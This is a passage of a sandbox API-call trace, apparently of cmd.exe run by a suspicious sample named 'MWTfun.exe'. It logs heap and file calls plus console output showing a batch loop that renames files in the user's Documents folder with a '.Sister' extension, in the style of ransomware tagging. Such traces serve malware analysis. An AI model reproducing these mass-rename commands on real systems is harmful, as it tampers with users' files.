lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0305.449] ??_V@YAXPEAX@Z () returned 0x1 [0305.449] GetProcessHeap () returned 0x21ed8c70000 [0305.449] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2ca50 [0305.450] GetProcessHeap () returned 0x21ed8c70000 [0305.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5eda0 [0305.450] GetProcessHeap () returned 0x21ed8c70000 [0305.450] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5eda0, Size=0x130) returned 0x21ed8d2d810 [0305.450] GetProcessHeap () returned 0x21ed8c70000 [0305.450] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2d810) returned 0x130 [0305.450] malloc (_Size=0xffce) returned 0x21eda27fd00 [0305.450] ??_V@YAXPEAX@Z () returned 0x21eda27fd00 [0305.450] GetProcessHeap () returned 0x21ed8c70000 [0305.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7c60 [0305.450] GetProcessHeap () returned 0x21ed8c70000 [0305.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a040 [0305.450] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.450] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.450] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.451] GetLastError () returned 0x2 [0305.451] GetProcessHeap () returned 0x21ed8c70000 [0305.451] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed935ffa0 [0305.451] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed935ffb0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.451] SetErrorMode (uMode=0x0) returned 0x0 [0305.451] SetErrorMode (uMode=0x1) returned 0x0 [0305.451] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda27fd00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0305.451] SetErrorMode (uMode=0x0) returned 0x1 [0305.451] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0305.451] GetProcessHeap () returned 0x21ed8c70000 [0305.451] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9371840 [0305.452] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.452] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.452] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.452] GetLastError () returned 0x2 [0305.452] ??_V@YAXPEAX@Z () returned 0x1 [0305.452] malloc (_Size=0xffce) returned 0x21eda27fd00 [0305.452] ??_V@YAXPEAX@Z () returned 0x21eda27fd00 [0305.452] malloc (_Size=0xffce) returned 0x21eda28fce0 [0305.452] ??_V@YAXPEAX@Z () returned 0x21eda28fce0 [0305.452] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.452] GetLastError () returned 0x2 [0305.453] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.453] GetFileType (hFile=0x54) returned 0x2 [0305.453] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0305.453] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0305.453] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.453] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0305.454] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.454] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.455] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0305.461] longjmp () [0305.461] ??_V@YAXPEAX@Z () returned 0x1 [0305.461] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f368100, ftCreationTime.dwHighDateTime=0x1d5e58b, ftLastAccessTime.dwLowDateTime=0x9c5771a0, ftLastAccessTime.dwHighDateTime=0x1d5ece5, ftLastWriteTime.dwLowDateTime=0x9c5771a0, ftLastWriteTime.dwHighDateTime=0x1d5ece5, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="QyVPUpq5VyP.pps", cAlternateFileName="")) returned 1 [0305.461] GetProcessHeap () returned 0x21ed8c70000 [0305.461] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x1f8) returned 0x21ed8c758a0 [0305.462] GetProcessHeap () returned 0x21ed8c70000 [0305.462] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x1f8 [0305.462] GetProcessHeap () returned 0x21ed8c70000 [0305.462] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9373fa0 [0305.462] GetProcessHeap () returned 0x21ed8c70000 [0305.462] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9373fa0, Size=0x30) returned 0x21ed9373fa0 [0305.462] GetProcessHeap () returned 0x21ed8c70000 [0305.462] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9373fa0) returned 0x30 [0305.462] GetProcessHeap () returned 0x21ed8c70000 [0305.462] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9373fe0 [0305.462] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc8d50 [0305.463] ??_V@YAXPEAX@Z () returned 0x1 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9373fe0, Size=0x170) returned 0x21ed9373fe0 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9373fe0) returned 0x170 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9374160 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9374160, Size=0x290) returned 0x21ed9374160 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9374160) returned 0x290 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9374400 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9374400, Size=0x30) returned 0x21ed9374400 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9374400) returned 0x30 [0305.463] GetProcessHeap () returned 0x21ed8c70000 [0305.463] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9374440 [0305.463] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.464] GetProcessHeap () returned 0x21ed8c70000 [0305.464] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc8810 [0305.464] ??_V@YAXPEAX@Z () returned 0x1 [0305.464] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.464] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc71e0 [0305.464] FindClose (in: hFindFile=0x21ed8cc71e0 | out: hFindFile=0x21ed8cc71e0) returned 1 [0305.464] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7d20 [0305.464] FindClose (in: hFindFile=0x21ed8cc7d20 | out: hFindFile=0x21ed8cc7d20) returned 1 [0305.465] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe0a58275, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe0a58275, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc7720 [0305.465] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0305.465] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0305.465] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\QyVPUpq5VyP.pps", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f368100, ftCreationTime.dwHighDateTime=0x1d5e58b, ftLastAccessTime.dwLowDateTime=0x9c5771a0, ftLastAccessTime.dwHighDateTime=0x1d5ece5, ftLastWriteTime.dwLowDateTime=0x9c5771a0, ftLastWriteTime.dwHighDateTime=0x1d5ece5, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x4, dwReserved1=0x7, cFileName="QyVPUpq5VyP.pps", cAlternateFileName="QYVPUP~1.PPS")) returned 0x21ed8cc7d20 [0305.465] FindClose (in: hFindFile=0x21ed8cc7d20 | out: hFindFile=0x21ed8cc7d20) returned 1 [0305.465] _wcsnicmp (_String1="QYVPUP~1.PPS", _String2="QyVPUpq5VyP.pps", _MaxCount=0xf) returned 13 [0305.465] malloc (_Size=0x1ff9c) returned 0x21eda29fcc0 [0305.466] ??_V@YAXPEAX@Z () returned 0x21eda29fcc0 [0305.467] GetProcessHeap () returned 0x21ed8c70000 [0305.467] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45e30 [0305.467] ??_V@YAXPEAX@Z () returned 0x1 [0305.467] ??_V@YAXPEAX@Z () returned 0x1 [0305.467] GetProcessHeap () returned 0x21ed8c70000 [0305.467] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9374440, Size=0x170) returned 0x21ed9374440 [0305.468] GetProcessHeap () returned 0x21ed8c70000 [0305.468] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9374440) returned 0x170 [0305.468] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0305.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.468] GetFileType (hFile=0x50) returned 0x2 [0305.468] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.468] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0305.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.468] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0305.476] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.476] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.476] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0305.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.476] GetFileType (hFile=0x50) returned 0x2 [0305.476] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.476] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0305.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.477] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0305.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.477] GetFileType (hFile=0x50) returned 0x2 [0305.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.477] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.478] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9373fb0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9373fb0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.478] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"QyVPUpq5VyP.pps\" \"QyVPUpq5VyP.pps.Sister\" ") returned 44 [0305.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.478] GetFileType (hFile=0x50) returned 0x2 [0305.478] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.478] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.479] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2c) returned 1 [0305.479] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0305.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.479] GetFileType (hFile=0x50) returned 0x2 [0305.480] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.480] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.480] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.481] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0305.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.481] GetFileType (hFile=0x50) returned 0x2 [0305.481] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.481] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.481] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0305.482] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0305.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.482] GetFileType (hFile=0x50) returned 0x2 [0305.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.482] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.483] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0305.483] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0305.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.483] GetFileType (hFile=0x50) returned 0x2 [0305.483] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.483] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.485] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0305.490] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.490] GetFileType (hFile=0x50) returned 0x2 [0305.490] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.490] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.491] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.491] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9374410*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9374410*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.491] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"QyVPUpq5VyP.pps.Sister\" \"QyVPUpq5VyP.bat\" ") returned 44 [0305.491] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.491] GetFileType (hFile=0x50) returned 0x2 [0305.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.491] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.492] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.492] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2c) returned 1 [0305.497] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0305.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.497] GetFileType (hFile=0x50) returned 0x2 [0305.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.497] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0305.497] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.497] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0305.503] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.503] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.504] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.504] malloc (_Size=0xffce) returned 0x21eda29fcc0 [0305.504] ??_V@YAXPEAX@Z () returned 0x21eda29fcc0 [0305.504] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.504] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.504] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.504] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.504] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.504] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.504] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.504] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.504] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.504] ??_V@YAXPEAX@Z () returned 0x1 [0305.504] GetProcessHeap () returned 0x21ed8c70000 [0305.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc0) returned 0x21ed8d6a210 [0305.506] GetProcessHeap () returned 0x21ed8c70000 [0305.506] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a210, Size=0x68) returned 0x21ed8d64340 [0305.507] GetProcessHeap () returned 0x21ed8c70000 [0305.507] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64340) returned 0x68 [0305.507] GetProcessHeap () returned 0x21ed8c70000 [0305.507] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x70) returned 0x21ed8d67c30 [0305.507] GetProcessHeap () returned 0x21ed8c70000 [0305.507] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc0) returned 0x21ed8d6a890 [0305.507] GetProcessHeap () returned 0x21ed8c70000 [0305.507] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a890, Size=0x68) returned 0x21ed8d64180 [0305.507] GetProcessHeap () returned 0x21ed8c70000 [0305.507] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64180) returned 0x68 [0305.507] malloc (_Size=0xffce) returned 0x21eda29fcc0 [0305.507] ??_V@YAXPEAX@Z () returned 0x21eda29fcc0 [0305.507] GetProcessHeap () returned 0x21ed8c70000 [0305.507] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7d20 [0305.507] GetProcessHeap () returned 0x21ed8c70000 [0305.507] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93726e0 [0305.508] _wcsicmp (_String1="QyVPUpq5VyP.pps", _String2=".") returned 67 [0305.508] _wcsicmp (_String1="QyVPUpq5VyP.pps", _String2="..") returned 67 [0305.508] GetFileAttributesW (lpFileName="QyVPUpq5VyP.pps" (normalized: "c:\\users\\fd1hvy\\documents\\qyvpupq5vyp.pps")) returned 0x20 [0305.508] GetProcessHeap () returned 0x21ed8c70000 [0305.508] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93b6bb0 [0305.510] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93b6bc0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.510] SetErrorMode (uMode=0x0) returned 0x0 [0305.510] SetErrorMode (uMode=0x1) returned 0x0 [0305.510] GetFullPathNameW (in: lpFileName="QyVPUpq5VyP.pps", nBufferLength=0x7fe7, lpBuffer=0x21eda29fcc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\QyVPUpq5VyP.pps", lpFilePart=0xa6cf4fd660*="QyVPUpq5VyP.pps") returned 0x29 [0305.510] SetErrorMode (uMode=0x0) returned 0x1 [0305.510] GetProcessHeap () returned 0x21ed8c70000 [0305.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9372bc0 [0305.510] _wcsicmp (_String1="QyVPUpq5VyP.pps", _String2=".") returned 67 [0305.510] _wcsicmp (_String1="QyVPUpq5VyP.pps", _String2="..") returned 67 [0305.510] GetFileAttributesW (lpFileName="QyVPUpq5VyP.pps" (normalized: 